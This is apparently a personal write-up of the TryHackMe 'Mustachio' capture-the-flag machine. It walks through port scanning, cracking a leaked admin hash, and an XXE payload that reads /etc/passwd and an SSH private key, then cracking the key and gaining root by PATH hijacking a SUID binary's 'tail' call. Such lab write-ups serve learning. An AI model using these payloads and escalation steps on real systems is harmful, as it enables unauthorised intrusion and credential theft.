π§{THM} Mustachio
Last updated
Last updated
After a long break, now Im back with new machine. This time, i choose Mustachio from tryhackme. This machine need us to understand how xml works and how to exploit it. By end of this machine, I still looking more into excersice especially in xml exploitation and hardening.
Let boot2root this machine.
As usual, always start with scanning available port. I like to use NMAP with basic command like below
sudo nmap -sC -sV -A -T4 THM_Machine -o nmap/mustachio
From the scanning, there is nothing much I can do. Next, I do modify some commands to make it scanning all open port.
sudo nmap -p- --open THM_machine
We get something interesting here. Now we have 2 web servers which port 80 and 8765.
Next, brute-force the directory to find any information that can be used.
After a few minute, we got the some interesting directory. Let see what its.
Let download user.bak
Waiting Waitingβ¦β¦..
Once download complete, let see what inside.
Now we got detail about it. It show that this file contains credential that work on SQLite.
Oh wait, credential??. Let crack the hash using crackstation.
admin : bulldog19
Hurm, we got credential but there is no login page in port 80. Now we move to port 8765.
Once landing to this port, it show login page. VOILA.. put the credentials we get before.
Hurm,, at first I donβt have any idea. After looking at source code. I found something interesting.
We get 2 information here.
The url given look like hole??.. I donβt think so, because it show another interesting part. Remember this landing page, when we submit anything it request format xml. The format should be look like
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I couldΓ’β¬β’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You couldΓ’β¬β’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>
After looking some payload and exploitation, I found suitable xml payload for this.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<comment>
<name>&ent;</name>
<author>Barry Clad</author>
<com>Hiiii</com>
</comment>
And we manage to inject xml code here. That mean, we can retrieve id_rsa for barry user.
Barry??. Yes . Before this, it mention barry to connect into ssh.
Next, use same template with modify file request to
///home/barry/.ssh/id_rsa
And we got the private key. Let move to next step.
Since we got already the private key. Let copy it and change it into hash before cracking.
Ssh2john id_rsa > rsa_key
John rsa_key <wordlistpath>
After few minute, we got the phrase that can be use to login at ssh.
Before that, change the permission file
Chmod 600 id_rsa
Ssh -I id_rsa barry@<THM_machine>
Now we in as barry!!!.
As usual, the first flag locate in this directory. We got user flag β¦
Next we proceed to privilege/root. We cannot use sudo permission here since we donβt have barry password. Other method we can use is find.
Find / -perm -u=s -type f 2>/dev/null
Or use linpeas.
We got something interesting here, after looking at this file, it show that this file running tail for access log which we can modify tail to payload.
We need to put barry as one of the path.
PATH=/home/barry:$PATH
Create tail file and put payload here
Echo β/bin/bash/β>tail
Chmod +x tail
Running /home/joe/live_log
Yeppii.. We now root. Find the root flag and this machine is ours!.
GAMEOVER! :D S
